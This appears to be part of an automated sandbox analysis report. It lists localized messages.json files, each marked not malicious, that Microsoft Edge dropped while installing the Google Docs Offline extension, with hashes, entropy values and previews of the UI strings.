                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir528_1257897044\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                Download File
